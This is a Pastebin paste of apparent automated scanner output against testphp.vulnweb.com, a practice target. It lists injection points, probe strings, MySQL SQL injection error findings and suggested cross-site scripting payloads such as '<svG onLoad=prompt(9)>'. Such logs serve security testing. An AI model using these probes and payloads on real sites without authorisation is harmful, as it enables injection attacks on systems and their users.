API tools faq
paste
Chigs34

vunab

Chigs34
Jul 11th, 2020
26
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.85 KB | None | 0 0
raw download clone embed print report
  1.  
  2. URL: http://testphp.vulnweb.com/search.php?test=query
  3. response URL: http://testphp.vulnweb.com/search.php?test=query
  4. POST url: http://testphp.vulnweb.com/search.php?test=query
  5. Unfiltered: '"(){}<x>:/;
  6. Payload: 1zqjhh'"(){}<x>:/1zqjhh;9
  7. Type: form
  8. Injection point: searchFor
  9. Possible payloads: <svG onLoad=prompt(9)>
  10. Line: <h2 id='pagename'>searched for: 1zqjhh'"(){}<x>:/1zqjhh;9
  11.  
  12. URL: http://testphp.vulnweb.com/search.php?test=query/requestXaX404
  13. response URL: http://testphp.vulnweb.com/search.php?test=1zqjni'%22()%7B%7D%3Cx%3E:/1zqjni;9
  14. Unfiltered: N/A
  15. Payload: 1zqjni'"(){}<x>:/1zqjni;9
  16. Type: url
  17. Injection point: test
  18. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  19.  
  20. URL: http://testphp.vulnweb.com/search.php?test=query
  21. response URL: http://testphp.vulnweb.com/search.php?test=1zqjse'%22()%7B%7D%3Cx%3E:/1zqjse;9
  22. Unfiltered: N/A
  23. Payload: 1zqjse'"(){}<x>:/1zqjse;9
  24. Type: url
  25. Injection point: test
  26. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  27.  
  28. URL: http://testphp.vulnweb.com/login.php
  29. response URL: http://testphp.vulnweb.com/userinfo.php
  30. POST url: http://testphp.vulnweb.com/userinfo.php
  31. Unfiltered: N/A
  32. Payload: 1zqjmm'"(){}<x>:/1zqjmm;9
  33. Type: form
  34. Injection point: pass
  35. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  36.  
  37. URL: http://testphp.vulnweb.com/guestbook.php
  38. response URL: http://testphp.vulnweb.com/guestbook.php
  39. POST url: http://testphp.vulnweb.com/guestbook.php
  40. Unfiltered: '"(){}<x>:/;
  41. Payload: 1zqjjc'"(){}<x>:/1zqjjc;9
  42. Type: form
  43. Injection point: text
  44. Possible payloads: <svG onLoad=prompt(9)>
  45. Line: <img src="/images/remark.gif">&nbsp;&nbsp;1zqjjc'"(){}<x>:/1zqjjc;9
  46.  
  47. URL: http://testphp.vulnweb.com/guestbook.php
  48. response URL: http://testphp.vulnweb.com/guestbook.php
  49. POST url: http://testphp.vulnweb.com/guestbook.php
  50. Unfiltered: '"(){}<x>:/;
  51. Payload: 1zqjjc'"(){}<x>:/1zqjjc;9
  52. Type: form
  53. Injection point: name
  54. Possible payloads: <svG onLoad=prompt(9)>
  55. Line: <strong>1zqjjc'"(){}<x>:/1zqjjc;9
  56.  
  57. URL: http://testphp.vulnweb.com/artists.php?artist=2
  58. response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjsp'%22()%7B%7D%3Cx%3E:/1zqjsp;9
  59. Unfiltered: N/A
  60. Payload: 1zqjsp'"(){}<x>:/1zqjsp;9
  61. Type: url
  62. Injection point: artist
  63. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  64.  
  65. URL: http://testphp.vulnweb.com/artists.php?artist=3
  66. response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjab'%22()%7B%7D%3Cx%3E:/1zqjab;9
  67. Unfiltered: N/A
  68. Payload: 1zqjab'"(){}<x>:/1zqjab;9
  69. Type: url
  70. Injection point: artist
  71. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  72.  
  73. URL: http://testphp.vulnweb.com/listproducts.php?cat=1
  74. response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjqv'%22()%7B%7D%3Cx%3E:/1zqjqv;9
  75. Unfiltered: N/A
  76. Payload: 1zqjqv'"(){}<x>:/1zqjqv;9
  77. Type: url
  78. Injection point: cat
  79. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL
  80.  
  81. URL: http://testphp.vulnweb.com/listproducts.php?cat=1
  82. response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjqv'%22()%7B%7D%3Cx%3E:/1zqjqv;9
  83. Unfiltered: '"(){}<x>:/
  84. Payload: 1zqjqv'"(){}<x>:/1zqjqv;9
  85. Type: url
  86. Injection point: cat
  87. Line: error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjqv;9' at line 1
  88. Error: Payload delims do not surround this injection point. Found via search for entire payload.
  89.  
  90. URL: http://testphp.vulnweb.com/listproducts.php?artist=2
  91. response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjkk'%22()%7B%7D%3Cx%3E:/1zqjkk;9
  92. Unfiltered: N/A
  93. Payload: 1zqjkk'"(){}<x>:/1zqjkk;9
  94. Type: url
  95. Injection point: artist
  96. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL
  97.  
  98. URL: http://testphp.vulnweb.com/listproducts.php?artist=2
  99. response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjkk'%22()%7B%7D%3Cx%3E:/1zqjkk;9
  100. Unfiltered: '"(){}<x>:/
  101. Payload: 1zqjkk'"(){}<x>:/1zqjkk;9
  102. Type: url
  103. Injection point: artist
  104. Line: error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjkk;9' at line 1
  105. Error: Payload delims do not surround this injection point. Found via search for entire payload.
  106.  
  107. URL: http://testphp.vulnweb.com/listproducts.php?cat=2
  108. response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjjs'%22()%7B%7D%3Cx%3E:/1zqjjs;9
  109. Unfiltered: N/A
  110. Payload: 1zqjjs'"(){}<x>:/1zqjjs;9
  111. Type: url
  112. Injection point: cat
  113. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL
  114.  
  115. URL: http://testphp.vulnweb.com/listproducts.php?cat=2
  116. response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjjs'%22()%7B%7D%3Cx%3E:/1zqjjs;9
  117. Unfiltered: '"(){}<x>:/
  118. Payload: 1zqjjs'"(){}<x>:/1zqjjs;9
  119. Type: url
  120. Injection point: cat
  121. Line: error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjjs;9' at line 1
  122. Error: Payload delims do not surround this injection point. Found via search for entire payload.
  123.  
  124. URL: http://testphp.vulnweb.com/listproducts.php?artist=3
  125. response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjyy'%22()%7B%7D%3Cx%3E:/1zqjyy;9
  126. Unfiltered: N/A
  127. Payload: 1zqjyy'"(){}<x>:/1zqjyy;9
  128. Type: url
  129. Injection point: artist
  130. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL
  131.  
  132. URL: http://testphp.vulnweb.com/listproducts.php?artist=3
  133. response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjyy'%22()%7B%7D%3Cx%3E:/1zqjyy;9
  134. Unfiltered: '"(){}<x>:/
  135. Payload: 1zqjyy'"(){}<x>:/1zqjyy;9
  136. Type: url
  137. Injection point: artist
  138. Line: error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjyy;9' at line 1
  139. Error: Payload delims do not surround this injection point. Found via search for entire payload.
  140.  
  141. URL: http://testphp.vulnweb.com/product.php?pic=5
  142. response URL: http://testphp.vulnweb.com/product.php?pic=1zqjvq'%22()%7B%7D%3Cx%3E:/1zqjvq;9
  143. Unfiltered: N/A
  144. Payload: 1zqjvq'"(){}<x>:/1zqjvq;9
  145. Type: url
  146. Injection point: pic
  147. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  148.  
  149. URL: http://testphp.vulnweb.com/product.php?pic=3
  150. response URL: http://testphp.vulnweb.com/product.php?pic=1zqjhk'%22()%7B%7D%3Cx%3E:/1zqjhk;9
  151. Unfiltered: N/A
  152. Payload: 1zqjhk'"(){}<x>:/1zqjhk;9
  153. Type: url
  154. Injection point: pic
  155. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  156.  
  157. URL: http://testphp.vulnweb.com/showimage.php?file=.%2Fpictures%2F4.jpg
  158. response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjyy'%22()%7B%7D%3Cx%3E:/1zqjyy;9
  159. Unfiltered: '"(){}<x>:/;
  160. Payload: 1zqjyy'"(){}<x>:/1zqjyy;9
  161. Type: url
  162. Injection point: file
  163. Possible payloads: <svG onLoad=prompt(9)>
  164. Line: <p
  165. warning: fopen(): unable to access 1zqjyy'"(){}<x>:/1zqjyy;9
  166.  
  167. URL: http://testphp.vulnweb.com/product.php?pic=6
  168. response URL: http://testphp.vulnweb.com/product.php?pic=1zqjma'%22()%7B%7D%3Cx%3E:/1zqjma;9
  169. Unfiltered: N/A
  170. Payload: 1zqjma'"(){}<x>:/1zqjma;9
  171. Type: url
  172. Injection point: pic
  173. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  174.  
  175. URL: http://testphp.vulnweb.com/listproducts.php?artist=1
  176. response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjss'%22()%7B%7D%3Cx%3E:/1zqjss;9
  177. Unfiltered: N/A
  178. Payload: 1zqjss'"(){}<x>:/1zqjss;9
  179. Type: url
  180. Injection point: artist
  181. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL
  182.  
  183. URL: http://testphp.vulnweb.com/listproducts.php?artist=1
  184. response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjss'%22()%7B%7D%3Cx%3E:/1zqjss;9
  185. Unfiltered: '"(){}<x>:/
  186. Payload: 1zqjss'"(){}<x>:/1zqjss;9
  187. Type: url
  188. Injection point: artist
  189. Line: error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjss;9' at line 1
  190. Error: Payload delims do not surround this injection point. Found via search for entire payload.
  191.  
  192. URL: http://testphp.vulnweb.com/showimage.php?file=.%2Fpictures%2F3.jpg
  193. response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjuo'%22()%7B%7D%3Cx%3E:/1zqjuo;9
  194. Unfiltered: '"(){}<x>:/;
  195. Payload: 1zqjuo'"(){}<x>:/1zqjuo;9
  196. Type: url
  197. Injection point: file
  198. Possible payloads: <svG onLoad=prompt(9)>
  199. Line: <p
  200. warning: fopen(): unable to access 1zqjuo'"(){}<x>:/1zqjuo;9
  201.  
  202. URL: http://testphp.vulnweb.com/showimage.php?file=.%2Fpictures%2F6.jpg
  203. response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjgw'%22()%7B%7D%3Cx%3E:/1zqjgw;9
  204. Unfiltered: '"(){}<x>:/;
  205. Payload: 1zqjgw'"(){}<x>:/1zqjgw;9
  206. Type: url
  207. Injection point: file
  208. Possible payloads: <svG onLoad=prompt(9)>
  209. Line: <p
  210. warning: fopen(): unable to access 1zqjgw'"(){}<x>:/1zqjgw;9
  211.  
  212. URL: http://testphp.vulnweb.com/product.php?pic=2
  213. response URL: http://testphp.vulnweb.com/product.php?pic=1zqjry'%22()%7B%7D%3Cx%3E:/1zqjry;9
  214. Unfiltered: N/A
  215. Payload: 1zqjry'"(){}<x>:/1zqjry;9
  216. Type: url
  217. Injection point: pic
  218. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  219.  
  220. URL: http://testphp.vulnweb.com/showimage.php?file=.%2Fpictures%2F1.jpg
  221. response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjwy'%22()%7B%7D%3Cx%3E:/1zqjwy;9
  222. Unfiltered: '"(){}<x>:/;
  223. Payload: 1zqjwy'"(){}<x>:/1zqjwy;9
  224. Type: url
  225. Injection point: file
  226. Possible payloads: <svG onLoad=prompt(9)>
  227. Line: <p
  228. warning: fopen(): unable to access 1zqjwy'"(){}<x>:/1zqjwy;9
  229.  
  230. URL: http://testphp.vulnweb.com/product.php?pic=1
  231. response URL: http://testphp.vulnweb.com/product.php?pic=1zqjyk'%22()%7B%7D%3Cx%3E:/1zqjyk;9
  232. Unfiltered: N/A
  233. Payload: 1zqjyk'"(){}<x>:/1zqjyk;9
  234. Type: url
  235. Injection point: pic
  236. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  237.  
  238. URL: http://testphp.vulnweb.com/showimage.php?file=.%2Fpictures%2F2.jpg
  239. response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjie'%22()%7B%7D%3Cx%3E:/1zqjie;9
  240. Unfiltered: '"(){}<x>:/;
  241. Payload: 1zqjie'"(){}<x>:/1zqjie;9
  242. Type: url
  243. Injection point: file
  244. Possible payloads: <svG onLoad=prompt(9)>
  245. Line: <p
  246. warning: fopen(): unable to access 1zqjie'"(){}<x>:/1zqjie;9
  247.  
  248. URL: http://testphp.vulnweb.com/product.php?pic=4
  249. response URL: http://testphp.vulnweb.com/product.php?pic=1zqjpb'%22()%7B%7D%3Cx%3E:/1zqjpb;9
  250. Unfiltered: N/A
  251. Payload: 1zqjpb'"(){}<x>:/1zqjpb;9
  252. Type: url
  253. Injection point: pic
  254. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  255.  
  256. URL: http://testphp.vulnweb.com/showimage.php?file=.%2Fpictures%2F5.jpg
  257. response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjhf'%22()%7B%7D%3Cx%3E:/1zqjhf;9
  258. Unfiltered: '"(){}<x>:/;
  259. Payload: 1zqjhf'"(){}<x>:/1zqjhf;9
  260. Type: url
  261. Injection point: file
  262. Possible payloads: <svG onLoad=prompt(9)>
  263. Line: <p
  264. warning: fopen(): unable to access 1zqjhf'"(){}<x>:/1zqjhf;9
  265.  
  266. URL: http://testphp.vulnweb.com/product.php?pic=7
  267. response URL: http://testphp.vulnweb.com/product.php?pic=1zqjxw'%22()%7B%7D%3Cx%3E:/1zqjxw;9
  268. Unfiltered: N/A
  269. Payload: 1zqjxw'"(){}<x>:/1zqjxw;9
  270. Type: url
  271. Injection point: pic
  272. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  273.  
  274. URL: http://testphp.vulnweb.com/showimage.php?file=.%2Fpictures%2F7.jpg
  275. response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjfg'%22()%7B%7D%3Cx%3E:/1zqjfg;9
  276. Unfiltered: '"(){}<x>:/;
  277. Payload: 1zqjfg'"(){}<x>:/1zqjfg;9
  278. Type: url
  279. Injection point: file
  280. Possible payloads: <svG onLoad=prompt(9)>
  281. Line: <p
  282. warning: fopen(): unable to access 1zqjfg'"(){}<x>:/1zqjfg;9
  283.  
  284. URL: http://testphp.vulnweb.com/hpp/?pp=12
  285. response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjnf'%22()%7B%7D%3Cx%3E:/1zqjnf;9
  286. Unfiltered: '"(){}<x>:/;
  287. Payload: 1zqjnf'"(){}<x>:/1zqjnf;9
  288. Type: url
  289. Injection point: pp
  290. Possible payloads: x"/onmouseover=prompt(9)/", x"><svG onLoad=prompt(9)>, x" onmouseover=prompt(9) "
  291. Line: <a href="params.php?p=valid&pp=1zqjnf'"(){}<x>:/1zqjnf;9
  292.  
  293. URL: http://testphp.vulnweb.com/listproducts.php?cat=3
  294. response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjbp'%22()%7B%7D%3Cx%3E:/1zqjbp;9
  295. Unfiltered: N/A
  296. Payload: 1zqjbp'"(){}<x>:/1zqjbp;9
  297. Type: url
  298. Injection point: cat
  299. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL
  300.  
  301. URL: http://testphp.vulnweb.com/listproducts.php?cat=3
  302. response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjbp'%22()%7B%7D%3Cx%3E:/1zqjbp;9
  303. Unfiltered: '"(){}<x>:/
  304. Payload: 1zqjbp'"(){}<x>:/1zqjbp;9
  305. Type: url
  306. Injection point: cat
  307. Line: error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjbp;9' at line 1
  308. Error: Payload delims do not surround this injection point. Found via search for entire payload.
  309.  
  310. URL: http://testphp.vulnweb.com/artists.php?artist=1
  311. response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjbe'%22()%7B%7D%3Cx%3E:/1zqjbe;9
  312. Unfiltered: N/A
  313. Payload: 1zqjbe'"(){}<x>:/1zqjbe;9
  314. Type: url
  315. Injection point: artist
  316. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
  317.  
  318. URL: http://testphp.vulnweb.com/listproducts.php?cat=4
  319. response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjoy'%22()%7B%7D%3Cx%3E:/1zqjoy;9
  320. Unfiltered: N/A
  321. Payload: 1zqjoy'"(){}<x>:/1zqjoy;9
  322. Type: url
  323. Injection point: cat
  324. Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL
  325.  
  326. URL: http://testphp.vulnweb.com/listproducts.php?cat=4
  327. response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjoy'%22()%7B%7D%3Cx%3E:/1zqjoy;9
  328. Unfiltered: '"(){}<x>:/
  329. Payload: 1zqjoy'"(){}<x>:/1zqjoy;9
  330. Type: url
  331. Injection point: cat
  332. Line: error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjoy;9' at line 1
  333. Error: Payload delims do not surround this injection point. Found via search for entire payload.
  334.  
  335. URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
  336. response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjsl'%22()%7B%7D%3Cx%3E:/1zqjsl;9
  337. Unfiltered: '"(){}<x>:/;
  338. Payload: 1zqjsl'"(){}<x>:/1zqjsl;9
  339. Type: url
  340. Injection point: pp
  341. Possible payloads: <svG onLoad=prompt(9)>
  342. Line: <pvalid1zqjsl'"(){}<x>:/1zqjsl;9
  343.  
  344. URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
  345. response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjsi'%22()%7B%7D%3Cx%3E:/1zqjsi;9&pp=12
  346. Unfiltered: '"(){}<x>:/;
  347. Payload: 1zqjsi'"(){}<x>:/1zqjsi;9
  348. Type: url
  349. Injection point: p
  350. Possible payloads: <svG onLoad=prompt(9)>
  351. Line: <p1zqjsi'"(){}<x>:/1zqjsi;9
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!